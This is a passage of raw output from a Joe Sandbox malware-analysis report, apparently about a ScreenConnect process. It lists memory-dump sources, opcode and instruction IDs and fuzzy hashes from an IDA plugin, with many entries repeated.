                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: e841a375f49445f696fb3053190ca5b583581410e530eb6a24a148389a0b093e
                                                                                                                            • Instruction ID: 54519b129f92d903c88792198c20bdc65c5547d1f4586a3a410cb32f2a0c7399
                                                                                                                            • Opcode Fuzzy Hash: e841a375f49445f696fb3053190ca5b583581410e530eb6a24a148389a0b093e
                                                                                                                            • Instruction Fuzzy Hash: 5A014B71B101199F9B14CF6ADC8487BB7FEFBC8611B14856AE906E7210D630EC058BA0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: c2eefa80227acf0ba1b349f87efb9a1ec06ef7f5c48d2d81dcc14c99a1cefbfb
                                                                                                                            • Instruction ID: 4cb662079c02a08bcfea4c992cdbc73536a22d3c6943c16cd951201c47ba4723
                                                                                                                            • Opcode Fuzzy Hash: c2eefa80227acf0ba1b349f87efb9a1ec06ef7f5c48d2d81dcc14c99a1cefbfb
                                                                                                                            • Instruction Fuzzy Hash: B2012175E0021A8FCB40DFA8D85459EBBF4FF49314B10866AD419E7205FB34AA06CB90
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3571560900.00000000018CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 018CD000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_18cd000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 8c9528de0125d6754676bc6a0f8994c02f5bb3849f8485689cb1a649a68d5651
                                                                                                                            • Instruction ID: 283c007defb12266eb47d7d9481ec8c990de48df01cb21b8b57aac29a84f5856
                                                                                                                            • Opcode Fuzzy Hash: 8c9528de0125d6754676bc6a0f8994c02f5bb3849f8485689cb1a649a68d5651
                                                                                                                            • Instruction Fuzzy Hash: 7201F7310083049AE7109A6DCD84767BFD8EF417A4F18C63DED088A186C279D942C6F1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: bff424cbe7b040f74e67fb795429cca80ef906566d6a50b7701b9d520dbd5ae5
                                                                                                                            • Instruction ID: 8af1bc1640ed3e3d484e07c1b24bc5da20ed957e70b89690981e2a68bfb03959
                                                                                                                            • Opcode Fuzzy Hash: bff424cbe7b040f74e67fb795429cca80ef906566d6a50b7701b9d520dbd5ae5
                                                                                                                            • Instruction Fuzzy Hash: D2012B32B001258BDB149A39ED146EDBBE5EF88321F00447EDD06D7245DF78AD95C791
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: ee54d7dfd3ea25f3569ad6956450f6b06d7e87d932dde739e60c7a9504610308
                                                                                                                            • Instruction ID: f60e10cc5a0bdd28fc5aaac33b88c970946ef1d42d8db3a20913ae947ef2ebe9
                                                                                                                            • Opcode Fuzzy Hash: ee54d7dfd3ea25f3569ad6956450f6b06d7e87d932dde739e60c7a9504610308
                                                                                                                            • Instruction Fuzzy Hash: 9C113C70904219CBDB24DFA5D459BADBFB2FB88305F148019EA02E6294DB744881CF22
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: b2283fdfc61d2086ec1a2606bd69f822af68ca0414416173470baf063a936d7e
                                                                                                                            • Instruction ID: 65595ad0f563b2177af4e4bdf6b301786991e23ed2134dbfc79712f9c297df5c
                                                                                                                            • Opcode Fuzzy Hash: b2283fdfc61d2086ec1a2606bd69f822af68ca0414416173470baf063a936d7e
                                                                                                                            • Instruction Fuzzy Hash: 27011E75E0021A8FCB40DFA9D85459EBBF4FF88210B108669E519E3305EB34AA058B90
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 1150411099e1d9beaa8aaad8d350b2ac5548d5a4323a99c4ac03a4acaa57feab
                                                                                                                            • Instruction ID: 0cf72ef768ed197f7310d789b026bb4e4f4795d8d734523684ee461feb7c8097
                                                                                                                            • Opcode Fuzzy Hash: 1150411099e1d9beaa8aaad8d350b2ac5548d5a4323a99c4ac03a4acaa57feab
                                                                                                                            • Instruction Fuzzy Hash: DC012130B402158BDB14EBA5D4A566E7BB2BB88304F10C928DA16D7358EF749D8ACFD1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: aa1286175fa7ed11b490adbf0b17ce688bab9561ed5177f0ea430447adc60794
                                                                                                                            • Instruction ID: 9a9376d478b9931c73ac8d3dfc9d2b586713e5b2be854d00fc3cd20403b13286
                                                                                                                            • Opcode Fuzzy Hash: aa1286175fa7ed11b490adbf0b17ce688bab9561ed5177f0ea430447adc60794
                                                                                                                            • Instruction Fuzzy Hash: F3018175B101159FD708CF65CD84A7BB7FEFB88211B15852EE806E7351D630DC028B60
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 78366c55ec92da4b8a3c27b3923e980f0ca26ed48b3e5a411b55215f21699923
                                                                                                                            • Instruction ID: b144f8b614ddbb233badef9f57e15f0083588ecb44f24149e40b876b1f3f1d3f
                                                                                                                            • Opcode Fuzzy Hash: 78366c55ec92da4b8a3c27b3923e980f0ca26ed48b3e5a411b55215f21699923
                                                                                                                            • Instruction Fuzzy Hash: F801F9722083405FC702DB68DC6495EBFB5AE4512030486AFE919CB192EA31CD05C761
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 059b7c9405e11c588b10edb4e5d500313ca9a6b5a0b127133674ae0ed3046cee
                                                                                                                            • Instruction ID: 382962246f624b279f32f1923680d442f5aec521a8cd381bcbf9d87cede9bfdf
                                                                                                                            • Opcode Fuzzy Hash: 059b7c9405e11c588b10edb4e5d500313ca9a6b5a0b127133674ae0ed3046cee
                                                                                                                            • Instruction Fuzzy Hash: 91F0443220021A9FCB05CF94EC4199AB7BAFB88354B44852AFA05D7210D731DD16DB94
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3571560900.00000000018CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 018CD000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_18cd000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: dddc2c9ef59d4737432b54b18e8655287eaa237173cf8e89ad108b115c5140a0
                                                                                                                            • Instruction ID: e74693089766019afd041554fecc31e6e5b43df85df2b7b6ef0eaa761ff45e33
                                                                                                                            • Opcode Fuzzy Hash: dddc2c9ef59d4737432b54b18e8655287eaa237173cf8e89ad108b115c5140a0
                                                                                                                            • Instruction Fuzzy Hash: E7F0C271004340AEE7108A1ACC84B63FFE8EB41774F18C56EED484E286C2799841CAB0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 6ae72295bc61e162c2662b0d382e0e5229532e8032cbe665e52efaac3a0edc58
                                                                                                                            • Instruction ID: 8091834c943124fdadc0b135e1e679f39f08e516b395b2e9f13d162de19dd334
                                                                                                                            • Opcode Fuzzy Hash: 6ae72295bc61e162c2662b0d382e0e5229532e8032cbe665e52efaac3a0edc58
                                                                                                                            • Instruction Fuzzy Hash: 8AE02B367003289FDB049BB9A8045EEBFAAEB80670F00806AE809D3384DE31DD4147C0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: a6ceb244e2cb59f1a82e0485b13067cba315c9433f3f7828a637cf945ee35541
                                                                                                                            • Instruction ID: 7078992cbed9083c6433b1ffe4afad1bf945e46b711a163ce6e5cbb36f9a834f
                                                                                                                            • Opcode Fuzzy Hash: a6ceb244e2cb59f1a82e0485b13067cba315c9433f3f7828a637cf945ee35541
                                                                                                                            • Instruction Fuzzy Hash: 17F082722042159FD704CF68EC919AEBBE5FF88250740C93EE919D7250EB31DD06CB90
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: ff11505efcfb7530bde55156222d0aa53390f1b341a47de5001bbd1dfdc80134
                                                                                                                            • Instruction ID: 6d28edf12f4f443ba7f6b0ea599feaa3159767af0f798584315d9e7c80e19cc4
                                                                                                                            • Opcode Fuzzy Hash: ff11505efcfb7530bde55156222d0aa53390f1b341a47de5001bbd1dfdc80134
                                                                                                                            • Instruction Fuzzy Hash: 9CF030319006299BDB14DF64C5186EEBBF2AB4C305F10412DD802B7390CB790D45CBA5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: a4132265a1f86a2c22e727b68b75f9f17c0a6dd6f88dde26f8f9a431aaaf60a0
                                                                                                                            • Instruction ID: f80a2af143a941996cd735b9c06e3096290a0c5d890eb9679b2db0c86e25ed71
                                                                                                                            • Opcode Fuzzy Hash: a4132265a1f86a2c22e727b68b75f9f17c0a6dd6f88dde26f8f9a431aaaf60a0
                                                                                                                            • Instruction Fuzzy Hash: 6FE02B31B003196FDB109B689C003EE7EAAFB80264F008069DD44E7395EF34CD4543C4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 03c93370e6e345ddda08f8856b65408875a5daafb771b211e6ccaa5bc6183e4b
                                                                                                                            • Instruction ID: d33e5c3585d5545e75c2976c421ef1267f219f5ce8d148240eb88f48b7106b6f
                                                                                                                            • Opcode Fuzzy Hash: 03c93370e6e345ddda08f8856b65408875a5daafb771b211e6ccaa5bc6183e4b
                                                                                                                            • Instruction Fuzzy Hash: 9DF01735E106198FCB10EFA8D8446DCBBB1FF89314F1042A6E009EB220EB715E95CF51
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: c525f4fc74a8d88b197e90736f53cfca4312386f554fe69319cfd1ed8245d4ff
                                                                                                                            • Instruction ID: 0d7b865d0cf1ee5d45557019ac263b934a72d3785aa9de1630405792704285ae
                                                                                                                            • Opcode Fuzzy Hash: c525f4fc74a8d88b197e90736f53cfca4312386f554fe69319cfd1ed8245d4ff
                                                                                                                            • Instruction Fuzzy Hash: FAF0EDB290A2049FD740EFA8EA423D87BB4FB50204F0489AADC04E7210FA312F09CB81
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 0e9766b93ce07de616da5986c16b3f8a5d3bc951128c7d7d1d911cd95eae3c9a
                                                                                                                            • Instruction ID: bb9d4f233818ca566186bfcffeed9dff7ef9062c2c60027ffad38eb3636ece46
                                                                                                                            • Opcode Fuzzy Hash: 0e9766b93ce07de616da5986c16b3f8a5d3bc951128c7d7d1d911cd95eae3c9a
                                                                                                                            • Instruction Fuzzy Hash: B2E0C972901208EFCF02CFA4D944ADD7BB6EB15210F008159F90596261E7329E25EB51
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 393dc233bd4c5c9a6986b600f97b75398178f915aca4143d790fed5b705dfba0
                                                                                                                            • Instruction ID: 5a75fc0241115728b58ec416fa9d23542e18173cf9deadabaf4ac6483f3805fa
                                                                                                                            • Opcode Fuzzy Hash: 393dc233bd4c5c9a6986b600f97b75398178f915aca4143d790fed5b705dfba0
                                                                                                                            • Instruction Fuzzy Hash: DBD0C23220071647EF249EAEE4003B1B799EF80351F14853AEC8CC712CD6764CC08B80
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 08c301a33afee1620cf1597ce1242019bc95107238b343ea97c2c29aaf915c1a
                                                                                                                            • Instruction ID: 09045000933b9fb4bc9a3be8d26a550a8a9532f23678a350de91c682d938a8c4
                                                                                                                            • Opcode Fuzzy Hash: 08c301a33afee1620cf1597ce1242019bc95107238b343ea97c2c29aaf915c1a
                                                                                                                            • Instruction Fuzzy Hash: AEE0E5362407109FD304CB58D495F9177B4EB49364F014598EA158B7A2C6A2EC42CB40
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 2ad53f6780098e174f270d877c67440b11c7a496dae89317e20d0e5b5ff15991
                                                                                                                            • Instruction ID: 700f3b1c50ff664c7f0e98491a82805cf2d4acf41f8bb9431e4015b9a4b07c67
                                                                                                                            • Opcode Fuzzy Hash: 2ad53f6780098e174f270d877c67440b11c7a496dae89317e20d0e5b5ff15991
                                                                                                                            • Instruction Fuzzy Hash: 78E0E535D107198ECB01DBA4D8406DCFB75FF86314F104256E50477110E7712AD9CB91
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 2ad53f6780098e174f270d877c67440b11c7a496dae89317e20d0e5b5ff15991
                                                                                                                            • Instruction ID: 700f3b1c50ff664c7f0e98491a82805cf2d4acf41f8bb9431e4015b9a4b07c67
                                                                                                                            • Opcode Fuzzy Hash: 2ad53f6780098e174f270d877c67440b11c7a496dae89317e20d0e5b5ff15991
                                                                                                                            • Instruction Fuzzy Hash: 78E0E535D107198ECB01DBA4D8406DCFB75FF86314F104256E50477110E7712AD9CB91
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 2ad53f6780098e174f270d877c67440b11c7a496dae89317e20d0e5b5ff15991
                                                                                                                            • Instruction ID: 700f3b1c50ff664c7f0e98491a82805cf2d4acf41f8bb9431e4015b9a4b07c67
                                                                                                                            • Opcode Fuzzy Hash: 2ad53f6780098e174f270d877c67440b11c7a496dae89317e20d0e5b5ff15991
                                                                                                                            • Instruction Fuzzy Hash: 78E0E535D107198ECB01DBA4D8406DCFB75FF86314F104256E50477110E7712AD9CB91
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 2ad53f6780098e174f270d877c67440b11c7a496dae89317e20d0e5b5ff15991
                                                                                                                            • Instruction ID: 700f3b1c50ff664c7f0e98491a82805cf2d4acf41f8bb9431e4015b9a4b07c67
                                                                                                                            • Opcode Fuzzy Hash: 2ad53f6780098e174f270d877c67440b11c7a496dae89317e20d0e5b5ff15991
                                                                                                                            • Instruction Fuzzy Hash: 78E0E535D107198ECB01DBA4D8406DCFB75FF86314F104256E50477110E7712AD9CB91
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 2ad53f6780098e174f270d877c67440b11c7a496dae89317e20d0e5b5ff15991
                                                                                                                            • Instruction ID: 700f3b1c50ff664c7f0e98491a82805cf2d4acf41f8bb9431e4015b9a4b07c67
                                                                                                                            • Opcode Fuzzy Hash: 2ad53f6780098e174f270d877c67440b11c7a496dae89317e20d0e5b5ff15991
                                                                                                                            • Instruction Fuzzy Hash: 78E0E535D107198ECB01DBA4D8406DCFB75FF86314F104256E50477110E7712AD9CB91
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 2ad53f6780098e174f270d877c67440b11c7a496dae89317e20d0e5b5ff15991
                                                                                                                            • Instruction ID: 700f3b1c50ff664c7f0e98491a82805cf2d4acf41f8bb9431e4015b9a4b07c67
                                                                                                                            • Opcode Fuzzy Hash: 2ad53f6780098e174f270d877c67440b11c7a496dae89317e20d0e5b5ff15991
                                                                                                                            • Instruction Fuzzy Hash: 78E0E535D107198ECB01DBA4D8406DCFB75FF86314F104256E50477110E7712AD9CB91
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 6ab7522b3c19e5f4faca335a20888c3bf0b1873c2eac624d40e155c3107a0628
                                                                                                                            • Instruction ID: 75d5dde1ab6f0d4f56cfce1059e3676acf77b533f87e7a8438eaafc0707aa74f
                                                                                                                            • Opcode Fuzzy Hash: 6ab7522b3c19e5f4faca335a20888c3bf0b1873c2eac624d40e155c3107a0628
                                                                                                                            • Instruction Fuzzy Hash: 9DE0C222B086910BD312527CA818149BAA19FC62A17060AAAE4D5D73E5DE64AD89C391
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: f8cb4236e8860bac64123878c553f6ac32ef9b128b6be30e9b9abcbe79b168d8
                                                                                                                            • Instruction ID: 89d8777c8eb117fc9cd7b644a8fe6cd5f34e308bf5b6449b438d358ce432a89b
                                                                                                                            • Opcode Fuzzy Hash: f8cb4236e8860bac64123878c553f6ac32ef9b128b6be30e9b9abcbe79b168d8
                                                                                                                            • Instruction Fuzzy Hash: 4BD05E3524136397EF245B58E4147F8B669FF80365F144239ED49CB56DC3AA4CC9CB81
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 99f274a01b5f9db47566382b1ab0fa839276d2efd2a8f7d292678aa14a6f8e1b
                                                                                                                            • Instruction ID: 12b94611785c670a9a8524958443c7497117c6e6eff424f770a47848a3587495
                                                                                                                            • Opcode Fuzzy Hash: 99f274a01b5f9db47566382b1ab0fa839276d2efd2a8f7d292678aa14a6f8e1b
                                                                                                                            • Instruction Fuzzy Hash: 1FD05E65300201CFCA11DB28E981F4133F9BF48268B01CCA8ED09EF235DB21DC429B04
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: c9ad82bc984bd85805944fd674dcfb26f17fd0b4f81519edb1cf68de793000dc
                                                                                                                            • Instruction ID: c03266ce13d4df564963ac8ca95bda2e1f4a2c70792987b1a3e32f99a111a904
                                                                                                                            • Opcode Fuzzy Hash: c9ad82bc984bd85805944fd674dcfb26f17fd0b4f81519edb1cf68de793000dc
                                                                                                                            • Instruction Fuzzy Hash: 3CE04630904108CFCB84EB64EA49B68B7B5FF44348F204689DC098A2A2EB791E068B40
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 92fd2da12f996600e79efd1063d7fdfe20d9291c6c065fa6c4c2f021b5529376
                                                                                                                            • Instruction ID: c25407490804e674c84fb661628ac7a40c75ffedc40631d9998aee9dbbd18b82
                                                                                                                            • Opcode Fuzzy Hash: 92fd2da12f996600e79efd1063d7fdfe20d9291c6c065fa6c4c2f021b5529376
                                                                                                                            • Instruction Fuzzy Hash: 90D02B33A0018057D7009B50E9057647F22DF49315F148465F519DB254CB328852CB44
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: c295761dc005a6f15dfcc5c3a19a45289d6bf9108c3e2dc34826005426c77290
                                                                                                                            • Instruction ID: 406f58089fa56d8e42bb50923cd12dd5ce4649509df080316ad6a93eb1d42dbc
                                                                                                                            • Opcode Fuzzy Hash: c295761dc005a6f15dfcc5c3a19a45289d6bf9108c3e2dc34826005426c77290
                                                                                                                            • Instruction Fuzzy Hash: FBD01730A0010CEFCB40EFA8ED0055EF7F9EF48244B1085A9D808E3250EB31AF019B91
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
